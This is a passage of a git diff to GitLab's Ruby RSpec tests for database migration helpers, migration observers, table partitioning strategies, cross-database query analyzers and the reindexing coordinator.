model.queue_batched_background_migration( - 'MyJobClass', - :projects, - :id, - 'my', - 'arguments', - job_interval: 5.minutes, - batch_max_value: 1000) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( - job_class_name: 'MyJobClass', - table_name: 'projects', - column_name: 'id', - interval: 300, - min_value: 1, - max_value: 1000, - job_arguments: %w[my arguments]) - end - end - - context 'when the max_value is not given' do - context 'when records exist in the database' do - let!(:event1) { create(:event) } - let!(:event2) { create(:event) } - let!(:event3) { create(:event) } - - it 'creates the record with the current max value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.max_value).to eq(event3.id) - end - - it 'creates the record with an active status' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_active - end - end - - context 'when the database is empty' do - it 'sets the max value to the min value' do - expect do - model.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last - - expect(created_migration.max_value).to eq(created_migration.min_value) - end - - it 'creates the record with a finished status' do - expect do - 
model.queue_batched_background_migration('MyJobClass', :projects, :id, job_interval: 5.minutes) - end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) - - expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_finished - end - end - end - end - describe '#migrate_async' do it 'calls BackgroundMigrationWorker.perform_async' do expect(BackgroundMigrationWorker).to receive(:perform_async).with("Class", "hello", "world") @@ -583,7 +356,7 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do end describe '#finalized_background_migration' do - let(:job_coordinator) { Gitlab::BackgroundMigration::JobCoordinator.new(:main, BackgroundMigrationWorker) } + let(:job_coordinator) { Gitlab::BackgroundMigration::JobCoordinator.new(BackgroundMigrationWorker) } let!(:job_class_name) { 'TestJob' } let!(:job_class) { Class.new } @@ -605,7 +378,7 @@ RSpec.describe Gitlab::Database::Migrations::BackgroundMigrationHelpers do job_class.define_method(:perform, job_perform_method) allow(Gitlab::BackgroundMigration).to receive(:coordinator_for_database) - .with(:main).and_return(job_coordinator) + .with('main').and_return(job_coordinator) expect(job_coordinator).to receive(:migration_class_for) .with(job_class_name).at_least(:once) { job_class } diff --git a/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb b/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb new file mode 100644 index 00000000000..c45149d67bf --- /dev/null +++ b/spec/lib/gitlab/database/migrations/batched_background_migration_helpers_spec.rb @@ -0,0 +1,164 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Migrations::BatchedBackgroundMigrationHelpers do + let(:migration) do + ActiveRecord::Migration.new.extend(described_class) + end + + describe '#queue_batched_background_migration' do + let(:pgclass_info) { 
instance_double('Gitlab::Database::PgClass', cardinality_estimate: 42) } + + before do + allow(Gitlab::Database::PgClass).to receive(:for_table).and_call_original + end + + context 'when such migration already exists' do + it 'does not create duplicate migration' do + create( + :batched_background_migration, + job_class_name: 'MyJobClass', + table_name: :projects, + column_name: :id, + interval: 10.minutes, + min_value: 5, + max_value: 1005, + batch_class_name: 'MyBatchClass', + batch_size: 200, + sub_batch_size: 20, + job_arguments: [[:id], [:id_convert_to_bigint]] + ) + + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + [:id], [:id_convert_to_bigint], + job_interval: 5.minutes, + batch_min_value: 5, + batch_max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10) + end.not_to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count } + end + end + + it 'creates the database record for the migration' do + expect(Gitlab::Database::PgClass).to receive(:for_table).with(:projects).and_return(pgclass_info) + + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + job_interval: 5.minutes, + batch_min_value: 5, + batch_max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( + job_class_name: 'MyJobClass', + table_name: 'projects', + column_name: 'id', + interval: 300, + min_value: 5, + max_value: 1000, + batch_class_name: 'MyBatchClass', + batch_size: 100, + sub_batch_size: 10, + job_arguments: %w[], + status: 'active', + total_tuple_count: pgclass_info.cardinality_estimate) + end + + context 'when the job interval is lower than the minimum' do + let(:minimum_delay) { described_class::BATCH_MIN_DELAY } + + it 'sets the 
job interval to the minimum value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: minimum_delay - 1.minute) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.interval).to eq(minimum_delay) + end + end + + context 'when additional arguments are passed to the method' do + it 'saves the arguments on the database record' do + expect do + migration.queue_batched_background_migration( + 'MyJobClass', + :projects, + :id, + 'my', + 'arguments', + job_interval: 5.minutes, + batch_max_value: 1000) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to have_attributes( + job_class_name: 'MyJobClass', + table_name: 'projects', + column_name: 'id', + interval: 300, + min_value: 1, + max_value: 1000, + job_arguments: %w[my arguments]) + end + end + + context 'when the max_value is not given' do + context 'when records exist in the database' do + let!(:event1) { create(:event) } + let!(:event2) { create(:event) } + let!(:event3) { create(:event) } + + it 'creates the record with the current max value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.max_value).to eq(event3.id) + end + + it 'creates the record with an active status' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to 
be_active + end + end + + context 'when the database is empty' do + it 'sets the max value to the min value' do + expect do + migration.queue_batched_background_migration('MyJobClass', :events, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + created_migration = Gitlab::Database::BackgroundMigration::BatchedMigration.last + + expect(created_migration.max_value).to eq(created_migration.min_value) + end + + it 'creates the record with a finished status' do + expect do + migration.queue_batched_background_migration('MyJobClass', :projects, :id, job_interval: 5.minutes) + end.to change { Gitlab::Database::BackgroundMigration::BatchedMigration.count }.by(1) + + expect(Gitlab::Database::BackgroundMigration::BatchedMigration.last).to be_finished + end + end + end + end +end diff --git a/spec/lib/gitlab/database/migrations/instrumentation_spec.rb b/spec/lib/gitlab/database/migrations/instrumentation_spec.rb index 841d2a98a16..902d8e13a63 100644 --- a/spec/lib/gitlab/database/migrations/instrumentation_spec.rb +++ b/spec/lib/gitlab/database/migrations/instrumentation_spec.rb @@ -3,6 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:result_dir) { Dir.mktmpdir } + let(:connection) { ActiveRecord::Migration.connection } after do FileUtils.rm_rf(result_dir) @@ -14,11 +15,11 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:migration_version) { '12345' } it 'executes the given block' do - expect { |b| subject.observe(version: migration_version, name: migration_name, &b) }.to yield_control + expect { |b| subject.observe(version: migration_version, name: migration_name, connection: connection, &b) }.to yield_control end context 'behavior with observers' do - subject { described_class.new(observer_classes: [Gitlab::Database::Migrations::Observers::MigrationObserver], result_dir: result_dir).observe(version: migration_version, name: 
migration_name) {} } + subject { described_class.new(observer_classes: [Gitlab::Database::Migrations::Observers::MigrationObserver], result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) {} } let(:observer) { instance_double('Gitlab::Database::Migrations::Observers::MigrationObserver', before: nil, after: nil, record: nil) } @@ -29,7 +30,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do it 'instantiates observer with observation' do expect(Gitlab::Database::Migrations::Observers::MigrationObserver) .to receive(:new) - .with(instance_of(Gitlab::Database::Migrations::Observation), anything) { |observation| expect(observation.version).to eq(migration_version) } + .with(instance_of(Gitlab::Database::Migrations::Observation), anything, connection) { |observation| expect(observation.version).to eq(migration_version) } .and_return(observer) subject @@ -63,7 +64,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do end context 'on successful execution' do - subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name) {} } + subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) {} } it 'records walltime' do expect(subject.walltime).not_to be_nil @@ -83,7 +84,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do end context 'upon failure' do - subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name) { raise 'something went wrong' } } + subject { described_class.new(result_dir: result_dir).observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } } it 'raises the exception' do expect { subject }.to raise_error(/something went wrong/) @@ -93,7 +94,7 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do subject { 
instance.observations.first } before do - instance.observe(version: migration_version, name: migration_name) { raise 'something went wrong' } + instance.observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } rescue StandardError # ignore end @@ -125,8 +126,8 @@ RSpec.describe Gitlab::Database::Migrations::Instrumentation do let(:migration2) { double('migration2', call: nil) } it 'records observations for all migrations' do - subject.observe(version: migration_version, name: migration_name) {} - subject.observe(version: migration_version, name: migration_name) { raise 'something went wrong' } rescue nil + subject.observe(version: migration_version, name: migration_name, connection: connection) {} + subject.observe(version: migration_version, name: migration_name, connection: connection) { raise 'something went wrong' } rescue nil expect(subject.observations.size).to eq(2) end diff --git a/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb b/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb index 191ac29e3b3..5a19ae6581d 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_details_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryDetails do - subject { described_class.new(observation, directory_path) } + subject { described_class.new(observation, directory_path, connection) } + let(:connection) { ActiveRecord::Migration.connection } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } - let(:connection) { ActiveRecord::Base.connection } let(:query) { "select date_trunc('day', $1::timestamptz) + $2 * (interval '1 hour')" } let(:query_binds) { [Time.current, 3] } let(:directory_path) { Dir.mktmpdir } diff --git a/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb 
b/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb index 2e70a85fd5b..7b01e39f5f1 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_log_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryLog do - subject { described_class.new(observation, directory_path) } + subject { described_class.new(observation, directory_path, connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } let(:query) { 'select 1' } let(:directory_path) { Dir.mktmpdir } let(:migration_version) { 20210422152437 } diff --git a/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb b/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb index 9727a215d71..2515f0d4a06 100644 --- a/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/query_statistics_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::QueryStatistics do - subject { described_class.new(observation, double("unused path")) } + subject { described_class.new(observation, double("unused path"), connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } def mock_pgss(enabled: true) if enabled diff --git a/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb b/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb index e689759c574..4b08838d6bb 100644 --- a/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb +++ 
b/spec/lib/gitlab/database/migrations/observers/total_database_size_change_spec.rb @@ -2,10 +2,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::TotalDatabaseSizeChange do - subject { described_class.new(observation, double('unused path')) } + subject { described_class.new(observation, double('unused path'), connection) } let(:observation) { Gitlab::Database::Migrations::Observation.new } - let(:connection) { ActiveRecord::Base.connection } + let(:connection) { ActiveRecord::Migration.connection } let(:query) { 'select pg_database_size(current_database())' } it 'records the size change' do diff --git a/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb b/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb index e65f89747c4..b26bb8fbe41 100644 --- a/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb +++ b/spec/lib/gitlab/database/migrations/observers/transaction_duration_spec.rb @@ -2,8 +2,9 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Migrations::Observers::TransactionDuration do - subject(:transaction_duration_observer) { described_class.new(observation, directory_path) } + subject(:transaction_duration_observer) { described_class.new(observation, directory_path, connection) } + let(:connection) { ActiveRecord::Migration.connection } let(:observation) { Gitlab::Database::Migrations::Observation.new(migration_version, migration_name) } let(:directory_path) { Dir.mktmpdir } let(:log_file) { "#{directory_path}/#{migration_version}_#{migration_name}-transaction-duration.json" } @@ -78,17 +79,17 @@ RSpec.describe Gitlab::Database::Migrations::Observers::TransactionDuration do end def run_real_transactions - ActiveRecord::Base.transaction do + ApplicationRecord.transaction do end end def run_sub_transactions - ActiveRecord::Base.transaction(requires_new: true) do + ApplicationRecord.transaction(requires_new: true) do end end def run_transaction - 
ActiveRecord::Base.connection_pool.with_connection do |connection| + ApplicationRecord.connection_pool.with_connection do |connection| Gitlab::Database::SharedModel.using_connection(connection) do Gitlab::Database::SharedModel.transaction do Gitlab::Database::SharedModel.transaction(requires_new: true) do diff --git a/spec/lib/gitlab/database/migrations/runner_spec.rb b/spec/lib/gitlab/database/migrations/runner_spec.rb index 52fb5ec2ba8..4616bd6941e 100644 --- a/spec/lib/gitlab/database/migrations/runner_spec.rb +++ b/spec/lib/gitlab/database/migrations/runner_spec.rb @@ -76,7 +76,7 @@ RSpec.describe Gitlab::Database::Migrations::Runner do it 'runs the unapplied migrations in version order', :aggregate_failures do up.run - expect(migration_runs.map(&:dir)).to eq([:up, :up]) + expect(migration_runs.map(&:dir)).to match_array([:up, :up]) expect(migration_runs.map(&:version_to_migrate)).to eq(pending_migrations.map(&:version)) end end @@ -101,7 +101,7 @@ RSpec.describe Gitlab::Database::Migrations::Runner do it 'runs the applied migrations for the current branch in reverse order', :aggregate_failures do down.run - expect(migration_runs.map(&:dir)).to eq([:down, :down]) + expect(migration_runs.map(&:dir)).to match_array([:down, :down]) expect(migration_runs.map(&:version_to_migrate)).to eq(applied_migrations_this_branch.reverse.map(&:version)) end end diff --git a/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb b/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb index b2c4e4b54a4..2ef873e8adb 100644 --- a/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb +++ b/spec/lib/gitlab/database/partitioning/detached_partition_dropper_spec.rb @@ -90,18 +90,6 @@ RSpec.describe Gitlab::Database::Partitioning::DetachedPartitionDropper do expect(table_oid('test_partition')).to be_nil end - context 'when the drop_detached_partitions feature flag is disabled' do - before do - 
stub_feature_flags(drop_detached_partitions: false) - end - - it 'does not drop the partition' do - dropper.perform - - expect(table_oid('test_partition')).not_to be_nil - end - end - context 'removing foreign keys' do it 'removes foreign keys from the table before dropping it' do expect(dropper).to receive(:drop_detached_partition).and_wrap_original do |drop_method, partition_name| diff --git a/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb b/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb index 1c6f5c5c694..5e107109fc9 100644 --- a/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb +++ b/spec/lib/gitlab/database/partitioning/partition_manager_spec.rb @@ -16,7 +16,7 @@ RSpec.describe Gitlab::Database::Partitioning::PartitionManager do subject(:sync_partitions) { described_class.new(model).sync_partitions } let(:model) { double(partitioning_strategy: partitioning_strategy, table_name: table, connection: connection) } - let(:partitioning_strategy) { double(missing_partitions: partitions, extra_partitions: []) } + let(:partitioning_strategy) { double(missing_partitions: partitions, extra_partitions: [], after_adding_partitions: nil) } let(:connection) { ActiveRecord::Base.connection } let(:table) { "some_table" } @@ -83,7 +83,7 @@ RSpec.describe Gitlab::Database::Partitioning::PartitionManager do let(:manager) { described_class.new(model) } let(:model) { double(partitioning_strategy: partitioning_strategy, table_name: table, connection: connection) } - let(:partitioning_strategy) { double(extra_partitions: extra_partitions, missing_partitions: []) } + let(:partitioning_strategy) { double(extra_partitions: extra_partitions, missing_partitions: [], after_adding_partitions: nil) } let(:connection) { ActiveRecord::Base.connection } let(:table) { "foo" } @@ -101,28 +101,10 @@ RSpec.describe Gitlab::Database::Partitioning::PartitionManager do ] end - context 'with the partition_pruning feature flag enabled' do - before do - 
stub_feature_flags(partition_pruning: true) - end - - it 'detaches each extra partition' do - extra_partitions.each { |p| expect(manager).to receive(:detach_one_partition).with(p) } - - sync_partitions - end - end + it 'detaches each extra partition' do + extra_partitions.each { |p| expect(manager).to receive(:detach_one_partition).with(p) } - context 'with the partition_pruning feature flag disabled' do - before do - stub_feature_flags(partition_pruning: false) - end - - it 'returns immediately' do - expect(manager).not_to receive(:detach) - - sync_partitions - end + sync_partitions end end diff --git a/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb b/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb new file mode 100644 index 00000000000..9941241e846 --- /dev/null +++ b/spec/lib/gitlab/database/partitioning/single_numeric_list_partition_spec.rb @@ -0,0 +1,50 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Partitioning::SingleNumericListPartition do + describe '.from_sql' do + subject(:parsed_partition) { described_class.from_sql(table, partition_name, definition) } + + let(:table) { 'partitioned_table' } + let(:partition_value) { 0 } + let(:partition_name) { "partitioned_table_#{partition_value}" } + let(:definition) { "FOR VALUES IN ('#{partition_value}')" } + + it 'uses specified table name' do + expect(parsed_partition.table).to eq(table) + end + + it 'uses specified partition name' do + expect(parsed_partition.partition_name).to eq(partition_name) + end + + it 'parses the definition' do + expect(parsed_partition.value).to eq(partition_value) + end + end + + describe '#partition_name' do + it 'is the explicit name if provided' do + expect(described_class.new('table', 1, partition_name: 'some_other_name').partition_name).to eq('some_other_name') + end + + it 'defaults to the table name followed by the partition value' do + expect(described_class.new('table', 
1).partition_name).to eq('table_1') + end + end + + context 'sorting' do + it 'is incomparable if the tables do not match' do + expect(described_class.new('table1', 1) <=> described_class.new('table2', 2)).to be_nil + end + + it 'sorts by the value when the tables match' do + expect(described_class.new('table1', 1) <=> described_class.new('table1', 2)).to eq(1 <=> 2) + end + + it 'sorts by numeric value rather than text value' do + expect(described_class.new('table', 10)).to be > described_class.new('table', 9) + end + end +end diff --git a/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb b/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb new file mode 100644 index 00000000000..636a09e5710 --- /dev/null +++ b/spec/lib/gitlab/database/partitioning/sliding_list_strategy_spec.rb @@ -0,0 +1,214 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Partitioning::SlidingListStrategy do + let(:connection) { ActiveRecord::Base.connection } + let(:table_name) { :_test_partitioned_test } + let(:model) { double('model', table_name: table_name, ignored_columns: %w[partition]) } + let(:next_partition_if) { double('next_partition_if') } + let(:detach_partition_if) { double('detach_partition_if') } + + subject(:strategy) do + described_class.new(model, :partition, + next_partition_if: next_partition_if, + detach_partition_if: detach_partition_if) + end + + before do + connection.execute(<<~SQL) + create table #{table_name} + ( + id serial not null, + partition bigint not null default 2, + created_at timestamptz not null, + primary key (id, partition) + ) + partition by list(partition); + + create table #{table_name}_1 + partition of #{table_name} for values in (1); + + create table #{table_name}_2 + partition of #{table_name} for values in (2); + SQL + end + + describe '#current_partitions' do + it 'detects both partitions' do + expect(strategy.current_partitions).to eq([ + 
Gitlab::Database::Partitioning::SingleNumericListPartition.new(table_name, 1, partition_name: '_test_partitioned_test_1'), + Gitlab::Database::Partitioning::SingleNumericListPartition.new(table_name, 2, partition_name: '_test_partitioned_test_2') + ]) + end + end + + describe '#active_partition' do + it 'is the partition with the largest value' do + expect(strategy.active_partition.value).to eq(2) + end + end + + describe '#missing_partitions' do + context 'when next_partition_if returns true' do + let(:next_partition_if) { proc { true } } + + it 'is a partition definition for the next partition in the series' do + extra = strategy.missing_partitions + + expect(extra.length).to eq(1) + expect(extra.first.value).to eq(3) + end + end + + context 'when next_partition_if returns false' do + let(:next_partition_if) { proc { false } } + + it 'is empty' do + expect(strategy.missing_partitions).to be_empty + end + end + + context 'when there are no partitions for the table' do + it 'returns a partition for value 1' do + connection.execute("drop table #{table_name}_1; drop table #{table_name}_2;") + + missing_partitions = strategy.missing_partitions + + expect(missing_partitions.size).to eq(1) + missing_partition = missing_partitions.first + + expect(missing_partition.value).to eq(1) + end + end + end + + describe '#extra_partitions' do + before do + (3..10).each do |i| + connection.execute("CREATE TABLE #{table_name}_#{i} PARTITION OF #{table_name} FOR VALUES IN (#{i})") + end + end + + context 'when some partitions are true for detach_partition_if' do + let(:detach_partition_if) { ->(p) { p != 5 } } + + it 'is the leading set of partitions before that value' do + expect(strategy.extra_partitions.map(&:value)).to contain_exactly(1, 2, 3, 4) + end + end + + context 'when all partitions are true for detach_partition_if' do + let(:detach_partition_if) { proc { true } } + + it 'is all but the most recent partition', :aggregate_failures do + 
expect(strategy.extra_partitions.map(&:value)).to contain_exactly(1, 2, 3, 4, 5, 6, 7, 8, 9) + + expect(strategy.current_partitions.map(&:value).max).to eq(10) + end + end + end + + describe '#initial_partition' do + it 'starts with the value 1', :aggregate_failures do + initial_partition = strategy.initial_partition + expect(initial_partition.value).to eq(1) + expect(initial_partition.table).to eq(strategy.table_name) + expect(initial_partition.partition_name).to eq("#{strategy.table_name}_1") + end + end + + describe '#next_partition' do + it 'is one after the active partition', :aggregate_failures do + expect(strategy).to receive(:active_partition).and_return(double(value: 5)) + next_partition = strategy.next_partition + + expect(next_partition.value).to eq(6) + expect(next_partition.table).to eq(strategy.table_name) + expect(next_partition.partition_name).to eq("#{strategy.table_name}_6") + end + end + + describe '#ensure_partitioning_column_ignored!' do + it 'raises when the column is not ignored' do + expect do + Class.new(ApplicationRecord) do + include PartitionedTable + + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: proc { false }, + detach_partition_if: proc { false } + end + end.to raise_error(/ignored_columns/) + end + + it 'does not raise when the column is ignored' do + expect do + Class.new(ApplicationRecord) do + include PartitionedTable + + self.ignored_columns = [:partition] + + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: proc { false }, + detach_partition_if: proc { false } + end + end.not_to raise_error + end + end + context 'redirecting inserts as the active partition changes' do + let(:model) do + Class.new(ApplicationRecord) do + include PartitionedTable + + self.table_name = '_test_partitioned_test' + self.primary_key = :id + + self.ignored_columns = %w[partition] + + # method().call cannot be detected by rspec, so we add a layer of indirection here + def 
self.next_partition_if_wrapper(...) + next_partition?(...) + end + + def self.detach_partition_if_wrapper(...) + detach_partition?(...) + end + partitioned_by :partition, strategy: :sliding_list, + next_partition_if: method(:next_partition_if_wrapper), + detach_partition_if: method(:detach_partition_if_wrapper) + + def self.next_partition?(current_partition) + end + + def self.detach_partition?(partition) + end + end + end + + it 'redirects to the new partition', :aggregate_failures do + partition_2_model = model.create! # Goes in partition 2 + + allow(model).to receive(:next_partition?) do + model.partitioning_strategy.active_partition.value < 3 + end + + allow(model).to receive(:detach_partition?).and_return(false) + + Gitlab::Database::Partitioning::PartitionManager.new(model).sync_partitions + + partition_3_model = model.create! + + # Rails doesn't pick up on database default changes, so we need to reload + # We also want to grab the partition column to verify what it was set to. + # In normal operation we make rails ignore it so that we can use a changing default + # So we force select * to load it + all_columns = model.select(model.arel_table[Arel.star]) + partition_2_model = all_columns.find(partition_2_model.id) + partition_3_model = all_columns.find(partition_3_model.id) + + expect(partition_2_model.partition).to eq(2) + expect(partition_3_model.partition).to eq(3) + end + end +end diff --git a/spec/lib/gitlab/database/query_analyzer_spec.rb b/spec/lib/gitlab/database/query_analyzer_spec.rb index 82a1c7143d5..34c72893c53 100644 --- a/spec/lib/gitlab/database/query_analyzer_spec.rb +++ b/spec/lib/gitlab/database/query_analyzer_spec.rb @@ -128,11 +128,20 @@ RSpec.describe Gitlab::Database::QueryAnalyzer, query_analyzers: false do it 'does not call analyze on suppressed analyzers' do expect(analyzer).to receive(:suppressed?).and_return(true) + expect(analyzer).to receive(:requires_tracking?).and_return(false) expect(analyzer).not_to receive(:analyze) expect { 
process_sql("SELECT 1 FROM projects") }.not_to raise_error end + it 'does call analyze on suppressed analyzers if some queries require tracking' do + expect(analyzer).to receive(:suppressed?).and_return(true) + expect(analyzer).to receive(:requires_tracking?).and_return(true) + expect(analyzer).to receive(:analyze) + + expect { process_sql("SELECT 1 FROM projects") }.not_to raise_error + end + def process_sql(sql) described_class.instance.within do ApplicationRecord.load_balancer.read_write do |connection| diff --git a/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb b/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb index ab5f05e3ec4..86e74cf5177 100644 --- a/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb +++ b/spec/lib/gitlab/database/query_analyzers/gitlab_schemas_metrics_spec.rb @@ -17,7 +17,7 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::GitlabSchemasMetrics, query_ana process_sql(ActiveRecord::Base, "SELECT 1 FROM projects") end - context 'properly observes all queries', :mocked_ci_connection do + context 'properly observes all queries', :add_ci_connection do using RSpec::Parameterized::TableSyntax where do diff --git a/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb b/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb index eb8ccb0bd89..c41b4eeea10 100644 --- a/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb +++ b/spec/lib/gitlab/database/query_analyzers/prevent_cross_database_modification_spec.rb @@ -92,6 +92,23 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::PreventCrossDatabaseModificatio end end end + + context 'when comments are added to the front of query strings' do + around do |example| + prepend_comment_was = Marginalia::Comment.prepend_comment + Marginalia::Comment.prepend_comment = true + + example.run + + Marginalia::Comment.prepend_comment = 
prepend_comment_was + end + + it 'raises error' do + Project.transaction do + expect { run_queries }.to raise_error /Cross-database data modification/ + end + end + end end context 'when executing a SELECT FOR UPDATE query' do @@ -164,4 +181,49 @@ RSpec.describe Gitlab::Database::QueryAnalyzers::PreventCrossDatabaseModificatio end.to raise_error /Cross-database data modification.*The gitlab_schema was undefined/ end end + + context 'when execution is rescued with StandardError' do + it 'raises cross-database data modification exception' do + expect do + Project.transaction do + project.touch + project.connection.execute('UPDATE foo_bars_undefined_table SET a=1 WHERE id = -1') + end + rescue StandardError + # Ensures that standard rescue does not silence errors + end.to raise_error /Cross-database data modification.*The gitlab_schema was undefined/ + end + end + + context 'when uniquiness validation is tested', type: :model do + subject { build(:ci_variable) } + + it 'does not raise exceptions' do + expect do + is_expected.to validate_uniqueness_of(:key).scoped_to(:project_id, :environment_scope).with_message(/\(\w+\) has already been taken/) + end.not_to raise_error + end + end + + context 'when doing rollback in a suppressed block' do + it 'does not raise misaligned transactions exception' do + expect do + # This is non-materialised transaction: + # 1. the transaction will be open on a write (project.touch) (in a suppressed block) + # 2. 
the rescue will be handled outside of suppressed block + # + # This will create misaligned boundaries since BEGIN + # of transaction will be executed within a suppressed block + Project.transaction do + described_class.with_suppressed do + project.touch + + raise 'force rollback' + end + + # the ensure of `.transaction` executes `ROLLBACK TO SAVEPOINT` + end + end.to raise_error /force rollback/ + end + end end diff --git a/spec/lib/gitlab/database/reindexing/coordinator_spec.rb b/spec/lib/gitlab/database/reindexing/coordinator_spec.rb index 085fd3061ad..0afbe46b7f1 100644 --- a/spec/lib/gitlab/database/reindexing/coordinator_spec.rb +++ b/spec/lib/gitlab/database/reindexing/coordinator_spec.rb @@ -15,10 +15,18 @@ RSpec.describe Gitlab::Database::Reindexing::Coordinator do let(:action) { create(:reindex_action, index: index) } let!(:lease) { stub_exclusive_lease(lease_key, uuid, timeout: lease_timeout) } - let(:lease_key) { 'gitlab/database/reindexing/coordinator' } + let(:lease_key) { "gitlab/database/reindexing/coordinator/#{Gitlab::Database::PRIMARY_DATABASE_NAME}" } let(:lease_timeout) { 1.day } let(:uuid) { 'uuid' } + around do |example| + model = 